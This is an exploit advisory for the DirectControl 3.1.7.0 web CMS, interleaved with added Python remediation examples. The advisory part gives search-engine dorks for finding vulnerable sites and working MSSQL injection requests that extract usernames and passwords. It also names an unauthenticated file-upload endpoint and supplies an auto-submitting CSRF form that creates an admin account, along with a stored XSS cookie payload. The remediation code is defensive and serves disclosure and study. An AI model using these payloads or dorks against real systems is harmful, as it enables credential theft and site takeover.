DirectControlTM 3.1.7.0 - Multiple Vulnerabilities

EDB-ID: 30669
CVE:
Platform: Windows
Date: 2014-01-03



DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : www.directclarity.com
.:. Dork           : [1]intext:"DirectClarity, LLC All Rights Reserved."
                     [2]inurl:"/cm/password_retrieve.asp?redir_id=1"
####################################################################

################################
[1] SQL Injection
===================
Type: MSSQL injection via POST parameter


Extract database version:
-------------------------

POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

redir_id=1&uname=' and+1=cast(@@version as int)-- -&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352

Request body template (|command| is the injected expression):
redir_id=1&uname=|command|&email_password=Email+My+Password


Extract username & password:
----------------------------

Information:
table name: portal_accounts
columns: username, password

POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int)-- -&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352

username:
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int)-- -&email_password=Email+My+Password

password:
redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts) as int)-- -&email_password=Email+My+Password
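The root cause in section [1] is a form value spliced into SQL text. The following is an added example, not code from the advisory or from DirectControl: a hypothetical reconstruction of the flawed query beside a parameterised lookup. sqlite3 stands in for MSSQL only so the block runs offline; the table and column names (portal_accounts, username, password) come from the advisory, while the email column, the sample row, the username allow-list and the function names are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the application's database. The advisory names the
# table portal_accounts with columns username and password; the email column
# and the sample row are assumed for the password-retrieval use case.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE portal_accounts (username TEXT, password TEXT, email TEXT)"
    )
    conn.execute(
        "INSERT INTO portal_accounts VALUES ('alice', 'hunter2', 'alice@example.invalid')"
    )
    conn.commit()
    return conn

# The uname value from the advisory's first request, URL-decoded.
INJECTED_UNAME = "' and 1=cast(@@version as int)-- -"

def vulnerable_sql(uname):
    """Hypothetical reconstruction of the flaw (not the vendor's code): the
    field is concatenated into the SQL text, so the leading quote closes the
    string literal and the rest is parsed as SQL. The cast() then fails and
    the conversion error message carries @@version back in the 500 page."""
    return "SELECT email FROM portal_accounts WHERE username = '" + uname + "'"

# Assumed username alphabet; tighten to whatever the application actually issues.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")

def lookup_email_param_only(conn, uname):
    """Parameterised lookup. The driver sends the value separately from the
    statement, so the quote and the cast() expression are compared as a
    literal string and never reach the SQL parser as code."""
    row = conn.execute(
        "SELECT email FROM portal_accounts WHERE username = ?", (uname,)
    ).fetchone()
    return row[0] if row else None

def lookup_email(conn, uname):
    """Hardened entry point: reject values outside the username alphabet first
    (cheap, and it keeps junk out of logs), then do the parameterised query.
    Returns the address or None; database error text is never returned."""
    if not USERNAME_RE.match(uname):
        return None
    return lookup_email_param_only(conn, uname)

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(INJECTED_UNAME))
    print(lookup_email(db, "alice"), lookup_email(db, INJECTED_UNAME))
```

The second function shows that parameterisation on its own already neutralises the payload; the allow-list is an extra layer, not a substitute. Returning a generic failure instead of the driver's error message closes the channel the advisory uses to read @@version.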


[2] Arbitrary File Upload
==========================

http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images

The uploaded file is then reachable under:
http://site/cm/media/images
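The upload action above takes both a client-chosen target directory (path) and a client-chosen file. As an added example, not code from the advisory or the product, here is the server-side validation a fixed handler would apply in Python: the path parameter is canonicalised and compared against an allow-list, the extension must be one of a known image set whose magic bytes match the content, and the on-disk name is generated by the server. The allow-list directory is the one in the advisory's URL; the accepted types, function names and naming scheme are assumptions.

```python
import posixpath
import secrets

# Allowed extension -> leading magic bytes the uploaded content must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

# Assumed allow-list: the only directory this upload action should write to,
# taken from the path parameter in the advisory's URL.
ALLOWED_DIRS = {"/cm/media/images"}

def safe_target_dir(requested_path):
    """Canonicalise the client-supplied path parameter and accept it only if it
    is exactly one of the allow-listed directories. Backslashes and ../ runs
    are normalised away before the comparison, so traversal cannot land the
    file in a script-served directory."""
    cleaned = "/" + requested_path.replace("\\", "/").lstrip("/")
    canonical = posixpath.normpath(cleaned)
    return canonical if canonical in ALLOWED_DIRS else None

def check_upload(filename, data):
    """Return (accepted, detail): detail is the normalised extension on success
    or the rejection reason otherwise."""
    name = posixpath.basename(filename.replace("\\", "/"))
    stem, ext = posixpath.splitext(name.lower())
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if "." in stem:
        # shell.asp.png and similar: the stored name keeps exactly one, known extension
        return False, "multiple extensions"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, ext

def store_upload(requested_path, filename, data):
    """Combine both checks and return the path the file would be written to,
    or None if anything is rejected. The name is server-generated, so the
    client never influences what ends up on disk."""
    target = safe_target_dir(requested_path)
    if target is None:
        return None
    accepted, detail = check_upload(filename, data)
    if not accepted:
        return None
    return posixpath.join(target, secrets.token_hex(16) + detail)

if __name__ == "__main__":
    print(store_upload("/cm/media/images", "logo.png", b"\x89PNG\r\n\x1a\n\x00"))
    print(store_upload("/cm/media/images/../../", "shell.asp", b"<% eval %>"))
```

Serving the upload directory with script execution disabled is the complementary control: even a file that slips past content checks should never be handed to the ASP engine.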


[3] CSRF [Add Admin]
=====================

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/cm/admin.asp">
<input type="hidden" name="fname" value="...."/>
<input type="hidden" name="lname" value="...."/>
<input type="hidden" name="uname" value="admin"/>
<input type="hidden" name="pword" value="123456"/>
<input type="hidden" name="telco" value="...."/>
<input type="hidden" name="email" value="...."/>
<input type="hidden" name="ustat" value="0"/>
<input type="hidden" name="SecGroupDropDown" value="1"/>
<input type="hidden" name="AddButton" value="ADD THIS USER"/>
<input type="hidden" name="pageView" value="User Administration"/>
<input type="hidden" name="pageAction" value="Add System User"/>
<input type="hidden" name="whatDo" value="AddUserAction"/>
</form>
</body>
</html>
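The form above works because admin.asp accepts the AddUserAction POST with nothing that ties it to the logged-in user's intent. As an added example, not code from the advisory or the product, here is the server-side gate in Python that would have rejected it: a synchroniser token derived from the session id under a server secret, compared in constant time, plus an Origin/Referer check as a second layer. The site origin is taken from the PoC's form action; the secret, session ids, token field name and function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed per-deployment secret; in a real application it lives in server
# configuration and is never sent to the browser.
SERVER_SECRET = secrets.token_bytes(32)

# Origin of the application, taken from the form action in the advisory's PoC.
SITE_ORIGIN = "http://site"

def issue_token(session_id):
    """Synchroniser token: HMAC of the session id under the server secret. The
    token is embedded in the legitimate admin form. A third-party page cannot
    read the victim's session id or the secret, so its auto-submitting form
    cannot carry a valid token."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def origin_matches(headers):
    """Second layer: Origin (or, failing that, Referer) of a state-changing
    POST must name this site. Fails closed when both headers are absent."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN

def csrf_check(session_id, form, headers):
    """Gate for admin.asp actions such as whatDo=AddUserAction.
    Returns (allowed, reason)."""
    if not origin_matches(headers):
        return False, "origin mismatch"
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid token"
    return True, "ok"

# The fields the advisory's hidden form submits; note there is no token among them.
FORGED_FORM = {
    "fname": "....", "lname": "....", "uname": "admin", "pword": "123456",
    "telco": "....", "email": "....", "ustat": "0", "SecGroupDropDown": "1",
    "AddButton": "ADD THIS USER", "pageView": "User Administration",
    "pageAction": "Add System User", "whatDo": "AddUserAction",
}

if __name__ == "__main__":
    print(csrf_check("sess-1", FORGED_FORM, {"Origin": "http://attacker.invalid"}))
    legit = dict(FORGED_FORM, csrf_token=issue_token("sess-1"))
    print(csrf_check("sess-1", legit, {"Referer": "http://site/cm/admin.asp"}))
```

Setting SameSite on the session cookie adds a browser-enforced third layer, but the token check is the one that does not depend on client behaviour.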


[4] Cross Site Scripting
=========================

Go to:
http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS Management

Add a new channel and enter the following as its value:
<script>alert(document.cookie);</script>

Then submit.
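The channel value is stored and later written back into the admin page unescaped. As an added example, not code from the advisory or the product, here are the two controls a fix would combine, in Python: output encoding for each HTML context the value lands in, and an HttpOnly session cookie so that document.cookie (what the payload reads) is empty of the session even if a script does run. The payload is the advisory's; the row markup, the cookie name sid and the function names are assumptions.

```python
import html

# The channel value from the advisory.
PAYLOAD = "<script>alert(document.cookie);</script>"

def render_channel_row(channel_name):
    """Render a stored channel name into the management page. html.escape with
    quote=True covers both contexts used here: element text and a double-quoted
    attribute value. Encoding at output time means the stored value keeps its
    original characters and every render path applies the same rule."""
    safe = html.escape(channel_name, quote=True)
    return (
        "<tr>"
        f"<td>{safe}</td>"
        f'<td><input type="text" name="channel" value="{safe}"></td>'
        "</tr>"
    )

def session_cookie_header(value):
    """Second layer: HttpOnly removes the session cookie from document.cookie;
    Secure and SameSite limit where the browser sends it. 'sid' is a
    placeholder cookie name, not the application's."""
    return f"Set-Cookie: sid={value}; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    print(render_channel_row(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

A Content-Security-Policy that disallows inline script would stop this particular payload as well, but it does not replace escaping: markup injected into attributes or URLs needs the context-specific encoding shown above.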

####################################################################